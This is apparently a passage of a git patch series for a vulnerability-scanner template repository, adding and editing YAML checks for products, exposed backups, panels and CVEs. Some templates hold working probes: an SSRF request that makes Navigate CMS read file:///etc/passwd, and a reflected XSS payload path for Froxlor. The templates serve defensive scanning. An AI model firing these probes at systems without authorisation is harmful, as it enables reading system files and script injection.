charset=UTF-8 limit=5&language=en&url=file:///etc/passwd - | - GET /navigate/navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1 + GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1 Host: {{Hostname}} cookie-reuse: true From b31f1730144f18e4949a6085852905be78ae59cb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 17 Jan 2023 18:00:25 +0530 Subject: [PATCH 0948/1133] Add files via upload --- technologies/xerox-workcentre-detect.yaml | 28 +++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 technologies/xerox-workcentre-detect.yaml diff --git a/technologies/xerox-workcentre-detect.yaml b/technologies/xerox-workcentre-detect.yaml new file mode 100644 index 0000000000..08849d0e00 --- /dev/null +++ b/technologies/xerox-workcentre-detect.yaml @@ -0,0 +1,28 @@ +id: xerox-workcentre-detect + +info: + name: Xerox Workcentre Detect + author: pussycat0x + severity: info + metadata: + verified: true + shodan-query: title:"XEROX WORKCENTRE" + tags: tech,xerox + +requests: + - method: GET + path: + - "{{BaseURL}}/index.dhtml" + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "XEROX WORKCENTRE" + - "/header.php?tab=status" + condition: and + + - type: status + status: + - 200 From e912b44b95628807a788821fef80fee96bd9676e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 17 Jan 2023 20:30:35 +0530 Subject: [PATCH 0949/1133] fix-template-order --- technologies/xerox-workcentre-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/xerox-workcentre-detect.yaml b/technologies/xerox-workcentre-detect.yaml index 08849d0e00..d55012c6b6 100644 --- a/technologies/xerox-workcentre-detect.yaml +++ b/technologies/xerox-workcentre-detect.yaml @@ -7,15 +7,15 @@ info: metadata: verified: true shodan-query: title:"XEROX WORKCENTRE" - tags: tech,xerox + tags: tech,xerox,workcentre requests: - method: GET path: - "{{BaseURL}}/index.dhtml" + matchers-condition: and matchers: - - type: word part: body words: From bab738d738702283b5709d89ccd61d4d8fe28220 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 15:04:33 +0000 Subject: [PATCH 0950/1133] Auto Generated New Template Addition List [Tue Jan 17 15:04:33 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 208c19e4c6..4dc37b2298 100644 --- a/.new-additions +++ b/.new-additions @@ -33,5 +33,6 @@ technologies/monstracms-detect.yaml technologies/ntop-detect.yaml technologies/wordpress/plugins/otter-blocks.yaml technologies/wordpress/plugins/webp-express.yaml +technologies/xerox-workcentre-detect.yaml token-spray/api-ipdata.yaml token-spray/api-ipinfo.yaml From f77f60aed284ccc3b7818fd66b141dca65ff3839 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 17 Jan 2023 20:46:44 +0530 Subject: [PATCH 0951/1133] move directory & directory added --- .../ backups /froxlor-database-backup.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) rename misconfiguration/froxlor-database-backup-file.yaml => exposures / backups /froxlor-database-backup.yaml (77%) diff --git a/misconfiguration/froxlor-database-backup-file.yaml b/exposures / backups /froxlor-database-backup.yaml similarity index 77% rename from misconfiguration/froxlor-database-backup-file.yaml rename to exposures / backups /froxlor-database-backup.yaml index 4cc2cce56c..f2fd04059f 100644 --- a/misconfiguration/froxlor-database-backup-file.yaml +++ b/exposures / backups /froxlor-database-backup.yaml @@ -1,13 +1,13 @@ -id: froxlor-database-backup-file +id: froxlor-database-backup info: - name: Froxlor Database Backup File + name: Froxlor Database Backup File Disclosure author: tess severity: low metadata: verified: true shodan-dork: title:"Froxlor Server Management Panel" - tags: froxlor,backup + tags: froxlor,backup,exposure,disclosure requests: - method: GET @@ -16,11 +16,10 @@ requests: matchers-condition: and matchers: - - type: word part: body words: - - "DROP TABLE IF EXISTS `ftp_groups`" + - "PRIMARY KEY" - "CREATE TABLE" condition: and From 39b8abc07d58fc4b0149b5d2904797bbbfce1814 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 17 Jan 2023 20:47:31 +0530 Subject: [PATCH 0952/1133] fix spacing --- .../ backups => exposures/backups}/froxlor-database-backup.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {exposures / backups => exposures/backups}/froxlor-database-backup.yaml (100%) diff --git a/exposures / backups /froxlor-database-backup.yaml b/exposures/backups/froxlor-database-backup.yaml similarity index 100% rename from exposures / backups /froxlor-database-backup.yaml rename to exposures/backups/froxlor-database-backup.yaml From ab48bc6ec53c71b7fe49c7cd1d59184421371050 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:54:08 +0530 Subject: [PATCH 0953/1133] updated FN matchers --- exposures/backups/froxlor-database-backup.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposures/backups/froxlor-database-backup.yaml b/exposures/backups/froxlor-database-backup.yaml index f2fd04059f..374209d545 100644 --- a/exposures/backups/froxlor-database-backup.yaml +++ b/exposures/backups/froxlor-database-backup.yaml @@ -19,14 +19,19 @@ requests: - type: word part: body words: - - "PRIMARY KEY" + - "DROP TABLE IF EXISTS `ftp_groups`" - "CREATE TABLE" + - "PRIMARY KEY" condition: and - type: word part: header words: - "application/sql" + - "application/x-sql" + - "application/octet-stream" + - "text/plain" + condition: or - type: status status: From aa1406d1408220014e04a0bb62250509c80a8437 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:58:45 +0530 Subject: [PATCH 0954/1133] update matcher --- exposures/backups/froxlor-database-backup.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/backups/froxlor-database-backup.yaml b/exposures/backups/froxlor-database-backup.yaml index 374209d545..103f74e0cb 100644 --- a/exposures/backups/froxlor-database-backup.yaml +++ b/exposures/backups/froxlor-database-backup.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - "DROP TABLE IF EXISTS `ftp_groups`" + - "DROP TABLE IF EXISTS" - "CREATE TABLE" - "PRIMARY KEY" condition: and From 01dae23097d951e340e5db0ad909d97ef6dd1478 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 17 Jan 2023 21:16:06 +0530 Subject: [PATCH 0955/1133] updated reference, tags and matcher type --- cves/2022/CVE-2022-28117.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-28117.yaml b/cves/2022/CVE-2022-28117.yaml index 14b99fdad6..8e4f6f721a 100644 --- a/cves/2022/CVE-2022-28117.yaml +++ b/cves/2022/CVE-2022-28117.yaml @@ -1,20 +1,20 @@ id: CVE-2022-28117 info: - name: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) + name: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) author: theabhinavgaur severity: medium description: | A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter. reference: + - https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html + - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5 - https://nvd.nist.gov/vuln/detail/CVE-2022-28117 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-28117 classification: cve-id: CVE-2022-28117 - cwe-id: CWE-918 metadata: verified: "true" - tags: cve,cve2022,ssrf,cms,Navigate,authenticated + tags: cve,cve2022,ssrf,navigate,cms,lfi,authenticated requests: @@ -56,10 +56,10 @@ requests: cookie-reuse: true matchers-condition: and matchers: - - type: word + - type: regex part: body - words: - - "root:/root:/bin/bash" + regex: + - "root:.*:0:0:" - type: status status: @@ -69,7 +69,7 @@ requests: - type: regex name: csrf_token part: body - internal: true group: 1 regex: - 'csrf_token" value="([a-f0-9]{64})' + internal: true From cb17c8285ba29f3492314741c997036a063cbf57 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 15:56:44 +0000 Subject: [PATCH 0956/1133] Auto Generated New Template Addition List [Tue Jan 17 15:56:44 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4dc37b2298..f041cb8917 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml exposed-panels/saltgui-panel.yaml exposed-panels/storybook-panel.yaml +exposures/backups/froxlor-database-backup.yaml exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml file/keys/stackhawk-api-key.yaml From 7ccc6a7171d34546f6ac1e292f414f84fe2efc92 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Tue, 17 Jan 2023 12:16:26 -0500 Subject: [PATCH 0957/1133] Create froxlor-reflected-xss.yaml --- misconfiguration/froxlor-reflected-xss.yaml | 34 +++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 misconfiguration/froxlor-reflected-xss.yaml diff --git a/misconfiguration/froxlor-reflected-xss.yaml b/misconfiguration/froxlor-reflected-xss.yaml new file mode 100644 index 0000000000..ebf5abd9d6 --- /dev/null +++ b/misconfiguration/froxlor-reflected-xss.yaml @@ -0,0 +1,34 @@ +id: froxlor-reflected-xss + +info: + name: Froxlor Reflected XSS + author: tess + severity: medium + metadata: + verified: true + shodan-dork: title:"Froxlor Server Management Panel" + tags: froxlor,xss + +requests: + - method: GET + path: + - '{{BaseURL}}//index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b' + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "javascript:alert(document.domain);dd//" + - "Froxlor" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From e7eefde771215b732074ac8e971cf54e554623e5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 01:04:20 +0530 Subject: [PATCH 0958/1133] Update froxlor-reflected-xss.yaml --- misconfiguration/froxlor-reflected-xss.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/misconfiguration/froxlor-reflected-xss.yaml b/misconfiguration/froxlor-reflected-xss.yaml index ebf5abd9d6..865196cf5f 100644 --- a/misconfiguration/froxlor-reflected-xss.yaml +++ b/misconfiguration/froxlor-reflected-xss.yaml @@ -1,7 +1,7 @@ id: froxlor-reflected-xss info: - name: Froxlor Reflected XSS + name: Froxlor - Cross Site Scripting author: tess severity: medium metadata: @@ -12,11 +12,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}//index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b' + - '{{BaseURL}}/index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b' matchers-condition: and matchers: - - type: word part: body words: From 37aaf465cbf5ba23dc1822f3db97a35c30d5b2d3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 01:19:54 +0530 Subject: [PATCH 0959/1133] matcher updated --- iot/snapdrop-detect.yaml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/iot/snapdrop-detect.yaml b/iot/snapdrop-detect.yaml index 8ceeb27449..d95bc13f4d 100644 --- a/iot/snapdrop-detect.yaml +++ b/iot/snapdrop-detect.yaml @@ -19,14 +19,7 @@ requests: - type: word part: body words: - - 'Snapdrop' - - 'Open Snapdrop on other devices to send files' - condition: and - - - type: word - part: header - words: - - "text/html" + - 'content="Snapdrop"' - type: status status: From 43b796b6b05489fa01d30093a596488ddb59184b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 19:59:13 +0000 Subject: [PATCH 0960/1133] Auto Generated New Template Addition List [Tue Jan 17 19:59:13 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f041cb8917..3e8704cbf8 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ exposures/backups/froxlor-database-backup.yaml exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml file/keys/stackhawk-api-key.yaml +iot/snapdrop-detect.yaml misconfiguration/aem/aem-childrenlist-xss.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml From 595072f23758d5b00bd4cad994c42d34b4c0d5ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 01:42:22 +0530 Subject: [PATCH 0961/1133] updated matchers --- exposed-panels/sap-successfactors-detect.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/exposed-panels/sap-successfactors-detect.yaml b/exposed-panels/sap-successfactors-detect.yaml index bfe77aea93..1a14705d90 100644 --- a/exposed-panels/sap-successfactors-detect.yaml +++ b/exposed-panels/sap-successfactors-detect.yaml @@ -12,23 +12,21 @@ info: requests: - method: GET path: + - '{{BaseURL}}' - '{{BaseURL}}/sf/start' + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - - type: word part: body words: - 'SAP SuccessFactors' - - 'ajaxSecKey=' + - 'sap-ui-core' condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From a5f0b296d5a049631207110ed019487b7f577889 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 02:08:19 +0530 Subject: [PATCH 0962/1133] updated matchers and path --- .../apache/kafka-manager-unauth.yaml | 20 ++++++++----------- 1 file changed, 8 insertions(+), 12 deletions(-) rename exposed-panels/kafka-manager-panel.yaml => misconfiguration/apache/kafka-manager-unauth.yaml (53%) diff --git a/exposed-panels/kafka-manager-panel.yaml b/misconfiguration/apache/kafka-manager-unauth.yaml similarity index 53% rename from exposed-panels/kafka-manager-panel.yaml rename to misconfiguration/apache/kafka-manager-unauth.yaml index b5e405f008..6854e21e14 100644 --- a/exposed-panels/kafka-manager-panel.yaml +++ b/misconfiguration/apache/kafka-manager-unauth.yaml @@ -1,7 +1,7 @@ -id: kafka-manager-panel +id: kafka-manager-unauth info: - name: Kafka Manager Panel + name: Kafka Manager Panel - Unauthorized Access author: Paper-Pen severity: low description: A kafka manager unauthorized access was discovered. @@ -9,24 +9,20 @@ info: - https://github.com/yahoo/CMAK metadata: fofa-query: app="Kafka-Manager" - tags: tech,kafka + tags: misconfig,apache,kafka,unauth,exposure requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}/addCluster" - matchers-condition: or + matchers-condition: and matchers: - type: word part: body words: - - "Kafka Manager" - - "Add Cluster" - - "Cluster Name" + - "Kafka Manager" - - type: word - part: header - words: - - "Kafka-Manager" + - type: status + status: + - 200 From 43a24077f41c5afb1eb9cb57080d6b6cea8d2c83 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 18 Jan 2023 02:12:24 +0530 Subject: [PATCH 0964/1133] Create kafka-manager-panel.yaml --- technologies/apache/kafka-manager-panel.yaml | 29 ++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 technologies/apache/kafka-manager-panel.yaml diff --git a/technologies/apache/kafka-manager-panel.yaml b/technologies/apache/kafka-manager-panel.yaml new file mode 100644 index 0000000000..cd335eb595 --- /dev/null +++ b/technologies/apache/kafka-manager-panel.yaml @@ -0,0 +1,29 @@ +id: kafka-manager-panel + +info: + name: Kafka Manager Panel + author: ritikchaddha + severity: info + reference: + - https://github.com/yahoo/CMAK + metadata: + verified: true + fofa-query: app="Kafka-Manager" + tags: tech,kafka,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Kafka Manager" + + - type: word + part: header + words: + - "Kafka-Manager" From e065fc059fccf602ec7df9383c52e8fcd110efe8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 20:44:59 +0000 Subject: [PATCH 0965/1133] Auto Generated New Template Addition List [Tue Jan 17 20:44:59 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3e8704cbf8..7a36f83adb 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ exposed-panels/ldap-account-manager-panel.yaml exposed-panels/modoboa-panel.yaml exposed-panels/monstra-admin-panel.yaml exposed-panels/saltgui-panel.yaml +exposed-panels/sap-successfactors-detect.yaml exposed-panels/storybook-panel.yaml exposures/backups/froxlor-database-backup.yaml exposures/configs/ovpn-config-exposed.yaml From fd30b520ed93c69716a43af41cc1430e9557cbf5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Jan 2023 02:44:09 +0530 Subject: [PATCH 0968/1133] shodan-query-added --- technologies/apache/kafka-manager-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/apache/kafka-manager-panel.yaml b/technologies/apache/kafka-manager-panel.yaml index cd335eb595..3728c7e1e7 100644 --- a/technologies/apache/kafka-manager-panel.yaml +++ b/technologies/apache/kafka-manager-panel.yaml @@ -9,6 +9,7 @@ info: metadata: verified: true fofa-query: app="Kafka-Manager" + shodan-query: title:"Kafka-Manager" tags: tech,kafka,apache requests: From 15c8a279967b2f219f74a9c12b327174d61a07f1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 21:20:00 +0000 Subject: [PATCH 0969/1133] Auto Generated New Template Addition List [Tue Jan 17 21:19:59 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7a36f83adb..dafea1f80e 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ exposures/mobiproxy-dashboard.yaml file/keys/stackhawk-api-key.yaml iot/snapdrop-detect.yaml misconfiguration/aem/aem-childrenlist-xss.yaml +misconfiguration/apache/kafka-manager-unauth.yaml misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml From 0cd513edf6f51a3e3c6344084a4de3eb0f4d6270 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 21:25:53 +0000 Subject: [PATCH 0971/1133] Auto Generated New Template Addition List [Tue Jan 17 21:25:53 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index dafea1f80e..a18420b2ee 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml cves/2022/CVE-2022-0234.yaml +cves/2022/CVE-2022-28117.yaml cves/2022/CVE-2022-29153.yaml cves/2022/CVE-2022-44877.yaml default-logins/empire/empirec2-default-login.yaml From 2d72b408638d35311aa8a2772c9b058fa683c6c9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 21:46:36 +0000 Subject: [PATCH 0972/1133] Auto Generated CVE annotations [Tue Jan 17 21:46:36 UTC 2023] :robot: --- cves/2022/CVE-2022-28117.yaml | 6 +++++- cves/2022/CVE-2022-44877.yaml | 2 +- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-28117.yaml b/cves/2022/CVE-2022-28117.yaml index 8e4f6f721a..331a927b6c 100644 --- a/cves/2022/CVE-2022-28117.yaml +++ b/cves/2022/CVE-2022-28117.yaml @@ -10,11 +10,15 @@ info: - https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5 - https://nvd.nist.gov/vuln/detail/CVE-2022-28117 + - https://www.youtube.com/watch?v=4kHW95CMfD0 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N + cvss-score: 4.9 cve-id: CVE-2022-28117 + cwe-id: CWE-918 metadata: verified: "true" - tags: cve,cve2022,ssrf,navigate,cms,lfi,authenticated + tags: authenticated,packetstorm,cve,cve2022,ssrf,navigate,cms,lfi requests: diff --git a/cves/2022/CVE-2022-44877.yaml b/cves/2022/CVE-2022-44877.yaml index 3f2261cc9d..e9763a5af2 100644 --- a/cves/2022/CVE-2022-44877.yaml +++ b/cves/2022/CVE-2022-44877.yaml @@ -19,7 +19,7 @@ info: metadata: shodan-query: http.title:"Login | Control WebPanel" verified: "true" - tags: cve,cve2022,centos,rce + tags: cve,cve2022,centos,rce,kev requests: - raw: From 443958fc80598fa25d6722f3bf91c1bccaa254d4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Jan 2023 03:33:06 +0530 Subject: [PATCH 0973/1133] tag-added --- misconfiguration/unauth-ldap-account-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-ldap-account-manager.yaml b/misconfiguration/unauth-ldap-account-manager.yaml index 1df20da84b..9bbb3681e4 100644 --- a/misconfiguration/unauth-ldap-account-manager.yaml +++ b/misconfiguration/unauth-ldap-account-manager.yaml @@ -7,7 +7,7 @@ info: metadata: verified: "true" shodan-dork: http.title:"LDAP Account Manager" - tags: ldap,misconfig + tags: ldap,misconfig,unauth requests: - method: GET From 14833d85f683d28981855ba3fbdbbd2529c5c5f4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 22:08:17 +0000 Subject: [PATCH 0974/1133] Auto Generated New Template Addition List [Tue Jan 17 22:08:17 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a18420b2ee..39e9fb1d5b 100644 --- a/.new-additions +++ b/.new-additions @@ -27,6 +27,7 @@ misconfiguration/installer/pmm-installer.yaml misconfiguration/ntopng-traffic-dashboard.yaml misconfiguration/phpcli-stack-trace.yaml misconfiguration/springboot/spring-eureka.yaml +misconfiguration/unauth-ldap-account-manager.yaml misconfiguration/webdav-enabled.yaml technologies/citrix-hypervisor-page.yaml technologies/dash-panel-detect.yaml From ba407b84be5694d22f30588175a21bcc4c26d782 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Jan 2023 03:39:36 +0530 Subject: [PATCH 0975/1133] Update and rename exposures/mobiproxy-dashboard.yaml to exposures/misconfiguration/mobiproxy-dashboard.yaml --- exposures/{ => misconfiguration}/mobiproxy-dashboard.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposures/{ => misconfiguration}/mobiproxy-dashboard.yaml (91%) diff --git a/exposures/mobiproxy-dashboard.yaml b/exposures/misconfiguration/mobiproxy-dashboard.yaml similarity index 91% rename from exposures/mobiproxy-dashboard.yaml rename to exposures/misconfiguration/mobiproxy-dashboard.yaml index 5c98dc4252..9de2daf99c 100644 --- a/exposures/mobiproxy-dashboard.yaml +++ b/exposures/misconfiguration/mobiproxy-dashboard.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-dork: http.title:"MobiProxy" - tags: dashboard,exposure,mobiproxy + tags: dashboard,exposure,mobiproxy,misconfig requests: - method: GET From 73b49d356f00d3424b9154bf009401c1ba005dab Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Jan 2023 03:42:26 +0530 Subject: [PATCH 0976/1133] aws-access-secret-key --- .../{aws-secret-key.yaml => aws-access-secret-key.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposures/tokens/amazon/{aws-secret-key.yaml => aws-access-secret-key.yaml} (77%) diff --git a/exposures/tokens/amazon/aws-secret-key.yaml b/exposures/tokens/amazon/aws-access-secret-key.yaml similarity index 77% rename from exposures/tokens/amazon/aws-secret-key.yaml rename to exposures/tokens/amazon/aws-access-secret-key.yaml index e2ab3b12f1..8b3852ade1 100644 --- a/exposures/tokens/amazon/aws-secret-key.yaml +++ b/exposures/tokens/amazon/aws-access-secret-key.yaml @@ -1,12 +1,12 @@ -id: aws-secret-key +id: aws-access-secret-key info: - name: AWS Secret Access Key + name: AWS Access/Secret Key Disclosure author: tess severity: unknown metadata: verified: "true" - tags: secret,aws,generic,exposure,amazon + tags: disclosure,aws,generic,exposure,amazon requests: - method: GET From 6eea6cfa803afc86f7657c99136575e4b363756c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 22:16:31 +0000 Subject: [PATCH 0977/1133] Auto Generated New Template Addition List [Tue Jan 17 22:16:31 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 39e9fb1d5b..ae17be3532 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ exposed-panels/storybook-panel.yaml exposures/backups/froxlor-database-backup.yaml exposures/configs/ovpn-config-exposed.yaml exposures/mobiproxy-dashboard.yaml +exposures/tokens/amazon/aws-access-secret-key.yaml file/keys/stackhawk-api-key.yaml iot/snapdrop-detect.yaml misconfiguration/aem/aem-childrenlist-xss.yaml From 979eb62f73a6dab94ae8af5a8c864bc32cef38ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 22:21:25 +0000 Subject: [PATCH 0978/1133] Auto Generated New Template Addition List [Tue Jan 17 22:21:25 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ae17be3532..a0b0acf96d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2017/CVE-2017-11165.yaml cves/2018/CVE-2018-11227.yaml cves/2018/CVE-2018-11473.yaml cves/2022/CVE-2022-0234.yaml From 3a0c7673167f9ecb32bae3e87df52897c9d15fbc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 22:22:23 +0000 Subject: [PATCH 0979/1133] Auto Generated New Template Addition List [Tue Jan 17 22:22:23 UTC 2023] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index a0b0acf96d..f203468c74 100644 --- a/.new-additions +++ b/.new-additions @@ -16,7 +16,7 @@ exposed-panels/sap-successfactors-detect.yaml exposed-panels/storybook-panel.yaml exposures/backups/froxlor-database-backup.yaml exposures/configs/ovpn-config-exposed.yaml -exposures/mobiproxy-dashboard.yaml +exposures/misconfiguration/mobiproxy-dashboard.yaml exposures/tokens/amazon/aws-access-secret-key.yaml file/keys/stackhawk-api-key.yaml iot/snapdrop-detect.yaml From 63ed4c46e51e3a0f7e7bc533df0474f3506b8d0c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 18 Jan 2023 03:53:34 +0530 Subject: [PATCH 0980/1133] Rename exposures/misconfiguration/mobiproxy-dashboard.yaml to misconfiguration/mobiproxy-dashboard.yaml --- .../mobiproxy-dashboard.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {exposures/misconfiguration => misconfiguration}/mobiproxy-dashboard.yaml (100%) diff --git a/exposures/misconfiguration/mobiproxy-dashboard.yaml b/misconfiguration/mobiproxy-dashboard.yaml similarity index 100% rename from exposures/misconfiguration/mobiproxy-dashboard.yaml rename to misconfiguration/mobiproxy-dashboard.yaml From 2556d9c99887b99674285902f7a80d3775e8dbb9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 22:23:50 +0000 Subject: [PATCH 0981/1133] Auto Generated New Template Addition List [Tue Jan 17 22:23:50 UTC 2023] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index f203468c74..42633aa2ca 100644 --- a/.new-additions +++ b/.new-additions @@ -16,7 +16,6 @@ exposed-panels/sap-successfactors-detect.yaml exposed-panels/storybook-panel.yaml exposures/backups/froxlor-database-backup.yaml exposures/configs/ovpn-config-exposed.yaml -exposures/misconfiguration/mobiproxy-dashboard.yaml exposures/tokens/amazon/aws-access-secret-key.yaml file/keys/stackhawk-api-key.yaml iot/snapdrop-detect.yaml @@ -26,6 +25,7 @@ misconfiguration/installer/impresspages-installer.yaml misconfiguration/installer/monstra-installer.yaml misconfiguration/installer/orangehrm-installer.yaml misconfiguration/installer/pmm-installer.yaml +misconfiguration/mobiproxy-dashboard.yaml misconfiguration/ntopng-traffic-dashboard.yaml misconfiguration/phpcli-stack-trace.yaml misconfiguration/springboot/spring-eureka.yaml From c4f27136b99f865239abe5f1e3998810175245d9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 17 Jan 2023 22:37:07 +0000 Subject: [PATCH 0982/1133] Auto Generated CVE annotations [Tue Jan 17 22:37:07 UTC 2023] :robot: --- cves/2017/CVE-2017-11165.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-11165.yaml b/cves/2017/CVE-2017-11165.yaml index df45e9d89f..d9808cb0e6 100644 --- a/cves/2017/CVE-2017-11165.yaml +++ b/cves/2017/CVE-2017-11165.yaml @@ -9,12 +9,17 @@ info: reference: - https://www.exploit-db.com/exploits/45094 - 